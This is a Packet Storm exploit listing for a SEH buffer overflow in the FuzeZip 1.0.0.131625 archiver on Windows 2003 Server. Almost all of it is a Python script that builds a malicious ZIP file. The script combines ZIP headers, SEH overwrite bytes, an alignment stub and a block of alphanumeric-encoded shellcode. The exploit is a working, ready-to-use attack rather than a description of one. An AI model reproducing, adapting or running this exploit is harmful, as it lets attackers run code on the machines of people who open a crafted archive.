FuzeZip 1.0.0.131625 Buffer Overflow

🗓️ 03 May 2013 00:00:00Reported by Pedro Guillen NunezType

packetstorm🔗 packetstormsecurity.com👁 24 Views

FuzeZip 1.0.0.131625 Buffer Overflow exploit for Windows 2003 Server Standard SP

`#!/usr/bin/python  
# Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0  
# Date: 16.Apr.2013 Vulnerability reported  
# Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon  
# Organization: RealPentesting   
# Vendor Homepage: http://fuzezip.com/  
# Software Link: http://download.fuzezip.com/FuzeZipSetup.exe  
# Version: 1.0.0.131625  
# Tested on: Windows 2003 Server Standard SP2  
  
header1 = (  
"\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E"  
"\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00"  
)  
  
#0x003F 335C  
  
seh = "\x9a\x9f"  
nextsh = "\x58\x70"  
  
header_m = "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x74\x65\x73\x74\x21\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00\x00\x00\x00\x00\x01\x00\x20\x08\x00\x00\x00\x00\x00\x00"  
header_f = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\xED\x17\x00\x00\xEC\x17\x00\x00\x00\x00"  
  
venetian = (  
"\x55\x55"  
"\x72"  
"\x58"  
"\x72"  
"\x05\x25\x11"  
"\x72"  
"\x2d\x11\x11"  
)  
  
shellcode = (  
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"  
"AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"  
"BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"  
"TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"  
"3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"  
"QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"  
"K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"  
"2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"  
"60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"  
"KKK045M5WKQ7N3RRRORJM0QCKOHUA"  
)  
  
print len(shellcode)  
  
payload = "\x90" * 818 + nextsh + seh + venetian + "\x90" * 109 + "\x72" + shellcode + "\x43" * 4323  
  
buff = payload   
print len(payload)  
mefile = open('josep.zip','w')  
mefile.write(header1 + buff + header_m + buff + header_f)  
mefile.close()  
  
  
  
  
  
`

03 May 2013 00:00Current

0.9Low risk

Vulners AI Score0.9